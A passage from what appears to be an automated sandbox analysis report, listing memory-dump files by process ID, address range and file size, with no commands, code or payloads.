                                                                                    Filesize

                                                                                    512KB

                                                                                  • memory/300-180-0x000007FEF2520000-0x000007FEF2EBD000-memory.dmp

                                                                                    Filesize

                                                                                    9.6MB

                                                                                  • memory/300-179-0x0000000002C20000-0x0000000002CA0000-memory.dmp

                                                                                    Filesize

                                                                                    512KB

                                                                                  • memory/300-182-0x0000000002C20000-0x0000000002CA0000-memory.dmp

                                                                                    Filesize

                                                                                    512KB

                                                                                  • memory/300-177-0x000007FEF2520000-0x000007FEF2EBD000-memory.dmp

                                                                                    Filesize

                                                                                    9.6MB

                                                                                  • memory/300-191-0x0000000002C20000-0x0000000002CA0000-memory.dmp

                                                                                    Filesize

                                                                                    512KB

                                                                                  • memory/300-176-0x000000001B6D0000-0x000000001B9B2000-memory.dmp

                                                                                    Filesize

                                                                                    2.9MB

                                                                                  • memory/300-178-0x00000000020B0000-0x00000000020B8000-memory.dmp

                                                                                    Filesize

                                                                                    32KB

                                                                                  • memory/300-208-0x000007FEF2520000-0x000007FEF2EBD000-memory.dmp

                                                                                    Filesize

                                                                                    9.6MB

                                                                                  • memory/300-207-0x0000000002C20000-0x0000000002CA0000-memory.dmp

                                                                                    Filesize

                                                                                    512KB

                                                                                  • memory/320-251-0x0000000002900000-0x0000000002980000-memory.dmp

                                                                                    Filesize

                                                                                    512KB

                                                                                  • memory/320-250-0x0000000002900000-0x0000000002980000-memory.dmp

                                                                                    Filesize

                                                                                    512KB

                                                                                  • memory/320-245-0x000007FEF2520000-0x000007FEF2EBD000-memory.dmp

                                                                                    Filesize

                                                                                    9.6MB

                                                                                  • memory/320-249-0x000007FEF2520000-0x000007FEF2EBD000-memory.dmp

                                                                                    Filesize

                                                                                    9.6MB

                                                                                  • memory/320-248-0x0000000002900000-0x0000000002980000-memory.dmp

                                                                                    Filesize

                                                                                    512KB

                                                                                  • memory/320-247-0x000007FEF2520000-0x000007FEF2EBD000-memory.dmp

                                                                                    Filesize

                                                                                    9.6MB

                                                                                  • memory/320-246-0x0000000002900000-0x0000000002980000-memory.dmp

                                                                                    Filesize

                                                                                    512KB

                                                                                  • memory/912-278-0x0000000002CB0000-0x0000000002D30000-memory.dmp

                                                                                    Filesize

                                                                                    512KB

                                                                                  • memory/912-300-0x0000000002CB0000-0x0000000002D30000-memory.dmp

                                                                                    Filesize

                                                                                    512KB

                                                                                  • memory/912-293-0x0000000002CB0000-0x0000000002D30000-memory.dmp

                                                                                    Filesize

                                                                                    512KB

                                                                                  • memory/912-286-0x0000000002CB0000-0x0000000002D30000-memory.dmp

                                                                                    Filesize

                                                                                    512KB

                                                                                  • memory/912-285-0x0000000002CB0000-0x0000000002D30000-memory.dmp

                                                                                    Filesize

                                                                                    512KB

                                                                                  • memory/912-284-0x0000000002CB0000-0x0000000002D30000-memory.dmp

                                                                                    Filesize

                                                                                    512KB

                                                                                  • memory/912-283-0x000007FEF2520000-0x000007FEF2EBD000-memory.dmp

                                                                                    Filesize

                                                                                    9.6MB

                                                                                  • memory/912-282-0x0000000002CB0000-0x0000000002D30000-memory.dmp

                                                                                    Filesize

                                                                                    512KB

                                                                                  • memory/912-277-0x000007FEF2520000-0x000007FEF2EBD000-memory.dmp

                                                                                    Filesize

                                                                                    9.6MB

                                                                                  • memory/912-280-0x0000000002CB0000-0x0000000002D30000-memory.dmp

                                                                                    Filesize

                                                                                    512KB

                                                                                  • memory/912-281-0x0000000002CB0000-0x0000000002D30000-memory.dmp

                                                                                    Filesize

                                                                                    512KB

                                                                                  • memory/912-279-0x000007FEF2520000-0x000007FEF2EBD000-memory.dmp

                                                                                    Filesize

                                                                                    9.6MB

                                                                                  • memory/912-299-0x0000000002CB0000-0x0000000002D30000-memory.dmp

                                                                                    Filesize

                                                                                    512KB

                                                                                  • memory/1372-223-0x0000000001D50000-0x0000000001D51000-memory.dmp

                                                                                    Filesize

                                                                                    4KB

                                                                                  • memory/2192-310-0x0000000002A50000-0x0000000002AD0000-memory.dmp

                                                                                    Filesize

                                                                                    512KB

                                                                                  • memory/2192-311-0x0000000002A50000-0x0000000002AD0000-memory.dmp

                                                                                    Filesize

                                                                                    512KB

                                                                                  • memory/2224-231-0x000007FEF1360000-0x000007FEF1CFD000-memory.dmp

                                                                                    Filesize

                                                                                    9.6MB

                                                                                  • memory/2224-238-0x0000000002B80000-0x0000000002C00000-memory.dmp

                                                                                    Filesize

                                                                                    512KB

                                                                                  • memory/2224-235-0x000007FEF1360000-0x000007FEF1CFD000-memory.dmp

                                                                                    Filesize

                                                                                    9.6MB

                                                                                  • memory/2224-237-0x0000000002B80000-0x0000000002C00000-memory.dmp

                                                                                    Filesize

                                                                                    512KB

                                                                                  • memory/2224-236-0x0000000002B80000-0x0000000002C00000-memory.dmp

                                                                                    Filesize

                                                                                    512KB

                                                                                  • memory/2224-239-0x000007FEF1360000-0x000007FEF1CFD000-memory.dmp

                                                                                    Filesize

                                                                                    9.6MB

                                                                                  • memory/2224-233-0x0000000002B80000-0x0000000002C00000-memory.dmp

                                                                                    Filesize

                                                                                    512KB

                                                                                  • memory/2224-230-0x000000001B4F0000-0x000000001B7D2000-memory.dmp

                                                                                    Filesize

                                                                                    2.9MB

                                                                                  • memory/2224-232-0x00000000021D0000-0x00000000021D8000-memory.dmp

                                                                                    Filesize

                                                                                    32KB

                                                                                  • memory/2512-297-0x0000000002AD0000-0x0000000002B50000-memory.dmp

                                                                                    Filesize

                                                                                    512KB

                                                                                  • memory/2512-294-0x0000000002AD2000-0x0000000002AD4000-memory.dmp

                                                                                    Filesize

                                                                                    8KB

                                                                                  • memory/2512-295-0x0000000002AD0000-0x0000000002B50000-memory.dmp

                                                                                    Filesize

                                                                                    512KB

                                                                                  • memory/2512-296-0x0000000002AD0000-0x0000000002B50000-memory.dmp

                                                                                    Filesize

                                                                                    512KB

                                                                                  • memory/2636-258-0x000007FEF2520000-0x000007FEF2EBD000-memory.dmp

                                                                                    Filesize

                                                                                    9.6MB

                                                                                  • memory/2636-259-0x0000000002DF0000-0x0000000002E70000-memory.dmp

                                                                                    Filesize

                                                                                    512KB

                                                                                  • memory/2636-264-0x000007FEF2520000-0x000007FEF2EBD000-memory.dmp

                                                                                    Filesize

                                                                                    9.6MB

                                                                                  • memory/2636-263-0x0000000002DF0000-0x0000000002E70000-memory.dmp

                                                                                    Filesize

                                                                                    512KB

                                                                                  • memory/2636-260-0x000007FEF2520000-0x000007FEF2EBD000-memory.dmp

                                                                                    Filesize

                                                                                    9.6MB

                                                                                  • memory/2636-262-0x0000000002DF0000-0x0000000002E70000-memory.dmp

                                                                                    Filesize

                                                                                    512KB

                                                                                  • memory/2636-261-0x0000000002DF0000-0x0000000002E70000-memory.dmp

                                                                                    Filesize

                                                                                    512KB

                                                                                  • memory/2852-301-0x0000000000230000-0x0000000000231000-memory.dmp

                                                                                    Filesize

                                                                                    4KB

                                                                                  • memory/2920-10-0x0000000002870000-0x00000000028F0000-memory.dmp

                                                                                    Filesize

                                                                                    512KB

                                                                                  • memory/2920-4-0x000000001B720000-0x000000001BA02000-memory.dmp

                                                                                    Filesize

                                                                                    2.9MB

                                                                                  • memory/2920-7-0x0000000002870000-0x00000000028F0000-memory.dmp

                                                                                    Filesize

                                                                                    512KB

                                                                                  • memory/2920-8-0x000007FEF5A30000-0x000007FEF63CD000-memory.dmp

                                                                                    Filesize

                                                                                    9.6MB

                                                                                  • memory/2920-6-0x000007FEF5A30000-0x000007FEF63CD000-memory.dmp

                                                                                    Filesize

                                                                                    9.6MB

                                                                                  • memory/2920-9-0x0000000002870000-0x00000000028F0000-memory.dmp

                                                                                    Filesize

                                                                                    512KB

                                                                                  • memory/2920-11-0x000007FEF5A30000-0x000007FEF63CD000-memory.dmp

                                                                                    Filesize

                                                                                    9.6MB

                                                                                  • memory/2920-5-0x00000000026F0000-0x00000000026F8000-memory.dmp

                                                                                    Filesize

                                                                                    32KB